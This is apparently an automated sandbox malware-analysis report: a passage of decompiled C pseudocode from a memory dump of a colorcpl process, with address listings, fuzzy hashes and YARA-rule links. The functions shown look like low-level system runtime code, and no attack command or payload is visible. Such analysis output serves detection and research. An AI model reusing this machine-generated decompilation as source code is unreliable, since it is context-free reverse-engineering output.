				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E06E45E50(0x6df67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E06EE9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E06E1F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                                0x06e461b3
                                                                                                0x06e461b5
                                                                                                0x06e461bd
                                                                                                0x06e461c3
                                                                                                0x06e461c7
                                                                                                0x06e461d2
                                                                                                0x06e461ff
                                                                                                0x06e461ff
                                                                                                0x06e46201
                                                                                                0x06e46207
                                                                                                0x06e46207
                                                                                                0x06e461d4
                                                                                                0x06e461d9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e461df
                                                                                                0x06e461e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e461e6
                                                                                                0x06e461e8
                                                                                                0x06e461ee
                                                                                                0x06e461ee
                                                                                                0x06e461f9
                                                                                                0x06e8762f
                                                                                                0x06e87632
                                                                                                0x06e87635
                                                                                                0x06e87639
                                                                                                0x06e87640
                                                                                                0x06e8766e
                                                                                                0x06e87675
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e87681
                                                                                                0x06e87689
                                                                                                0x06e8768d
                                                                                                0x06e87691
                                                                                                0x06e87695
                                                                                                0x06e87699
                                                                                                0x06e876af
                                                                                                0x06e876b5
                                                                                                0x06e876b7
                                                                                                0x06e876b7
                                                                                                0x06e876d7
                                                                                                0x06e876dc
                                                                                                0x00000000
                                                                                                0x06e876dc
                                                                                                0x06e876a2
                                                                                                0x06e876a9
                                                                                                0x06e87651
                                                                                                0x06e87653
                                                                                                0x06e87653
                                                                                                0x06e87656
                                                                                                0x06e87656
                                                                                                0x00000000
                                                                                                0x06e87656
                                                                                                0x06e87644
                                                                                                0x06e87646
                                                                                                0x06e87648
                                                                                                0x06e87648
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bc0604f37f3e8de3977fe770d26f7c7938b9b148b076020ce0af60fd4170f080
                                                                                                • Instruction ID: d7494cd5eb3b7d9edba0c0cff1bd732ee55c689d42a0454dd9fc07d75bb651a7
                                                                                                • Opcode Fuzzy Hash: bc0604f37f3e8de3977fe770d26f7c7938b9b148b076020ce0af60fd4170f080
                                                                                                • Instruction Fuzzy Hash: 6531AD71A293019FD7A4EF19C800B2AB7E4FB88B04F15596DE99C9B351E7B0E804CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E58EC7 Relevance: .1, Instructions: 92COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E06E58EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x6f0d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E06E44E70(0x6f086e4, 0x6e59490, 0, 0);
					if( *0x6f053e8 > 5 && E06E58F33(0x6f053e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x6f053e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x6f053e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x6dfbc46;
						_t48 = E06E97B9C(0x6f053e8, 0x6dfbc46, _t67, 0x6f053e8, _t70,  &_v140);
					}
				}
				return E06E5B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                                0x06e58ec7
                                                                                                0x06e58ed9
                                                                                                0x06e58edc
                                                                                                0x06e58ee6
                                                                                                0x06e58ee9
                                                                                                0x06e58eee
                                                                                                0x06e58efc
                                                                                                0x06e58f08
                                                                                                0x06e91349
                                                                                                0x06e91353
                                                                                                0x06e9135d
                                                                                                0x06e91366
                                                                                                0x06e9136f
                                                                                                0x06e91375
                                                                                                0x06e9137c
                                                                                                0x06e91385
                                                                                                0x06e91390
                                                                                                0x06e91391
                                                                                                0x06e9139c
                                                                                                0x06e9139d
                                                                                                0x06e913a6
                                                                                                0x06e913ac
                                                                                                0x06e913b2
                                                                                                0x06e913b5
                                                                                                0x06e913bc
                                                                                                0x06e913bf
                                                                                                0x06e913c2
                                                                                                0x06e913c5
                                                                                                0x06e913c8
                                                                                                0x06e913cb
                                                                                                0x06e913ce
                                                                                                0x06e913d1
                                                                                                0x06e913d4
                                                                                                0x06e913d7
                                                                                                0x06e913da
                                                                                                0x06e913dd
                                                                                                0x06e913e0
                                                                                                0x06e913e3
                                                                                                0x06e913e6
                                                                                                0x06e913e9
                                                                                                0x06e913f6
                                                                                                0x06e91400
                                                                                                0x06e91400
                                                                                                0x06e58f08
                                                                                                0x06e58f32

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 88d06d5c78a2f91c83fd5e16458f4108107c8f8dcb49377634defd58ed2eb828
                                                                                                • Instruction ID: 504e83fcaa38cb10f5dccfc51b97e93293acbcd65c54ca55047ab71d723b7d01
                                                                                                • Opcode Fuzzy Hash: 88d06d5c78a2f91c83fd5e16458f4108107c8f8dcb49377634defd58ed2eb828
                                                                                                • Instruction Fuzzy Hash: 9D41A2B1D0032C9EDB64CFAAD981AAEFBF9FB48310F5041AEE519A7240D7705A44CF60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E54A2C Relevance: .1, Instructions: 92COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 58%
                                                                                                			E06E54A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x6f0d360 ^ _t62;
				_v8 =  *0x6f0d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E06E32280(_t26, 0x6f08608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E06E2FFB0(_t41, _t51, 0x6f08608);
						L2:
						 *0x6f0b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E06E5B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E06E32280(_t28, 0x6f08608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E06E2FFB0(_t42, _t53, 0x6f08608);
							if(_t53 != 0) {
								L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E06E2FFB0(_t41, _t51, 0x6f08608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                                0x06e54a2c
                                                                                                0x06e54a34
                                                                                                0x06e54a3c
                                                                                                0x06e54a3e
                                                                                                0x06e54a48
                                                                                                0x06e54a4b
                                                                                                0x06e54a4d
                                                                                                0x06e54a51
                                                                                                0x06e54a9c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e54aa3
                                                                                                0x06e54aa8
                                                                                                0x06e54aad
                                                                                                0x06e54ab1
                                                                                                0x06e54ade
                                                                                                0x06e54ae3
                                                                                                0x06e54a5a
                                                                                                0x06e54a62
                                                                                                0x06e54a6a
                                                                                                0x06e54a6e
                                                                                                0x06e8f203
                                                                                                0x06e54a84
                                                                                                0x06e54a88
                                                                                                0x06e54a89
                                                                                                0x06e54a8a
                                                                                                0x06e54a95
                                                                                                0x06e54a95
                                                                                                0x06e54a79
                                                                                                0x06e54a80
                                                                                                0x06e54af2
                                                                                                0x06e54af4
                                                                                                0x06e54af9
                                                                                                0x06e54aff
                                                                                                0x06e54b01
                                                                                                0x06e54b03
                                                                                                0x06e54b08
                                                                                                0x06e8f20a
                                                                                                0x06e8f212
                                                                                                0x06e8f216
                                                                                                0x06e8f216
                                                                                                0x06e54b08
                                                                                                0x06e54b13
                                                                                                0x06e54b1a
                                                                                                0x06e8f229
                                                                                                0x06e8f229
                                                                                                0x06e54b1a
                                                                                                0x06e54a82
                                                                                                0x00000000
                                                                                                0x06e54a82
                                                                                                0x06e54ab7
                                                                                                0x06e54acd
                                                                                                0x06e54acd
                                                                                                0x06e54ad5
                                                                                                0x06e54ada
                                                                                                0x00000000
                                                                                                0x06e54ada
                                                                                                0x06e54ac2
                                                                                                0x06e54acb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e54acb
                                                                                                0x06e54a53
                                                                                                0x06e54a53
                                                                                                0x06e54a58
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0d8c20c833171f8363d01f367f33a719de1a79118e5b07ce547f05b544e27e3b
                                                                                                • Instruction ID: 7bc8bf6812a6cfc1b370fb97f983cf1880ad7fab400743563302bc408a117306
                                                                                                • Opcode Fuzzy Hash: 0d8c20c833171f8363d01f367f33a719de1a79118e5b07ce547f05b544e27e3b
                                                                                                • Instruction Fuzzy Hash: DE31EF32611350DFEBE1AE54CD44B6BB7E9FF85B14F026529E86A0B681E770D880CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4E730 Relevance: .1, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 74%
                                                                                                			E06E4E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E06E59670() < 0) {
					L06E6DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x6f07b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L06E34620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M06E4E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                                0x06e4e730
                                                                                                0x06e4e736
                                                                                                0x06e4e738
                                                                                                0x06e4e73d
                                                                                                0x06e4e73e
                                                                                                0x06e4e740
                                                                                                0x06e4e749
                                                                                                0x06e4e765
                                                                                                0x06e4e76a
                                                                                                0x06e4e76b
                                                                                                0x06e4e76c
                                                                                                0x06e4e76d
                                                                                                0x06e4e76e
                                                                                                0x06e4e76f
                                                                                                0x06e4e775
                                                                                                0x06e4e777
                                                                                                0x06e4e77e
                                                                                                0x06e8b675
                                                                                                0x06e4e784
                                                                                                0x06e4e784
                                                                                                0x06e4e789
                                                                                                0x06e4e7a8
                                                                                                0x06e4e7ac
                                                                                                0x06e4e807
                                                                                                0x06e4e7ae
                                                                                                0x06e4e7ae
                                                                                                0x06e4e7b1
                                                                                                0x06e4e7b4
                                                                                                0x06e4e7b9
                                                                                                0x06e4e7c0
                                                                                                0x06e4e7c4
                                                                                                0x06e4e7ca
                                                                                                0x06e4e7cc
                                                                                                0x00000000
                                                                                                0x06e4e7d3
                                                                                                0x06e4e7d6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4e7ff
                                                                                                0x06e4e802
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4e7f9
                                                                                                0x06e4e7fc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4e7f3
                                                                                                0x06e4e7f6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4e7ed
                                                                                                0x06e4e7f0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4e7e7
                                                                                                0x06e4e7ea
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8b685
                                                                                                0x06e8b688
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8b682
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4e7cc
                                                                                                0x06e4e7d9
                                                                                                0x06e4e7dc
                                                                                                0x06e4e7de
                                                                                                0x06e4e7de
                                                                                                0x06e4e7ac
                                                                                                0x06e4e7e4
                                                                                                0x06e4e74b
                                                                                                0x06e4e751
                                                                                                0x06e4e759
                                                                                                0x06e4e761
                                                                                                0x06e4e761

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5eb2231f7db24727619b707fd335fcb328570372e28802b5422aad19e229c000
                                                                                                • Instruction ID: 23c93645f9c0648d96e31ec6cf129f175eea83fc1c2a236b7b2ce10bd0b68202
                                                                                                • Opcode Fuzzy Hash: 5eb2231f7db24727619b707fd335fcb328570372e28802b5422aad19e229c000
                                                                                                • Instruction Fuzzy Hash: D1318F75A14349EFD784DF28D844F9AB7E8FB08324F159256F918CB381D631E880CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4BC2C Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 67%
                                                                                                			E06E4BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x6f06100; // 0x5f
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E06E32280(0xd, 0x22b1f1a0);
				_t41 =  *0x6f060f8; // 0x0
				if(_t41 != 0) {
					 *0x6f060f8 =  *_t41;
					 *0x6f060fc =  *0x6f060fc + 0xffff;
				}
				E06E2FFB0(_t41, 0x800, 0x22b1f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x6f060f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L06E34620(0x6f06100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x6f06100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                                0x06e4bc36
                                                                                                0x06e4bc42
                                                                                                0x06e4bc45
                                                                                                0x06e4bc4a
                                                                                                0x06e4bd35
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4bc50
                                                                                                0x06e4bc50
                                                                                                0x06e4bc58
                                                                                                0x06e4bc5a
                                                                                                0x06e4bc60
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8a4f2
                                                                                                0x06e8a4f6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8a4fc
                                                                                                0x06e4bc79
                                                                                                0x06e4bc7e
                                                                                                0x06e4bc86
                                                                                                0x06e4bd16
                                                                                                0x06e4bd20
                                                                                                0x06e4bd20
                                                                                                0x06e4bc8d
                                                                                                0x06e4bc94
                                                                                                0x06e4bcbd
                                                                                                0x06e4bcca
                                                                                                0x06e4bccb
                                                                                                0x06e4bccc
                                                                                                0x06e4bccd
                                                                                                0x06e4bcce
                                                                                                0x06e4bcd4
                                                                                                0x06e4bcea
                                                                                                0x06e4bcee
                                                                                                0x06e4bcf2
                                                                                                0x06e4bd00
                                                                                                0x06e4bd04
                                                                                                0x00000000
                                                                                                0x06e4bc96
                                                                                                0x06e4bcab
                                                                                                0x06e4bcaf
                                                                                                0x06e4bd2c
                                                                                                0x06e4bd2c
                                                                                                0x06e4bd09
                                                                                                0x00000000
                                                                                                0x06e4bd09
                                                                                                0x06e4bcb1
                                                                                                0x06e4bcb5
                                                                                                0x06e4bcbb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e4bcbb

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5bf6679cd435a7afa325e598a663c3e0b265a9da1a470189191dcbb80682c4fa
                                                                                                • Instruction ID: 8a6a469b43d6db6b6445746c0ba98130f1633294688dc4b7f7df9733ebc15d28
                                                                                                • Opcode Fuzzy Hash: 5bf6679cd435a7afa325e598a663c3e0b265a9da1a470189191dcbb80682c4fa
                                                                                                • Instruction Fuzzy Hash: CF31F136A047199FEB81EF68E8C07A673A5FB18315F1160B5DA45DB201E674D909CB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E41DB5 Relevance: .1, Instructions: 87COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 60%
                                                                                                			E06E41DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E06E3F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L06E34620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E06E3F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                                0x06e41dc2
                                                                                                0x06e41dc5
                                                                                                0x06e41dc7
                                                                                                0x06e41dcc
                                                                                                0x06e41dce
                                                                                                0x06e41dd6
                                                                                                0x06e41ddf
                                                                                                0x06e41de0
                                                                                                0x06e41de1
                                                                                                0x06e41de5
                                                                                                0x06e41de8
                                                                                                0x06e41def
                                                                                                0x06e41df0
                                                                                                0x06e41df6
                                                                                                0x06e41df7
                                                                                                0x06e41dfe
                                                                                                0x06e41e1a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e41e0b
                                                                                                0x06e41e12
                                                                                                0x06e41e12
                                                                                                0x06e41e00
                                                                                                0x06e41e00
                                                                                                0x06e41e05
                                                                                                0x06e41e1e
                                                                                                0x06e41e23
                                                                                                0x06e8570f
                                                                                                0x06e85713
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85719
                                                                                                0x06e85719
                                                                                                0x06e41e2c
                                                                                                0x06e41e2d
                                                                                                0x06e41e2e
                                                                                                0x06e41e2f
                                                                                                0x06e41e31
                                                                                                0x06e41e32
                                                                                                0x06e41e35
                                                                                                0x06e41e3d
                                                                                                0x06e85723
                                                                                                0x06e8573d
                                                                                                0x06e8573d
                                                                                                0x00000000
                                                                                                0x06e85723
                                                                                                0x06e41e49
                                                                                                0x06e41e4e
                                                                                                0x06e41e4e
                                                                                                0x06e41e09
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                • Instruction ID: 5b231cf6337d84099b9b12544cdca004da893c96c53e18350b72e8484d39dc22
                                                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
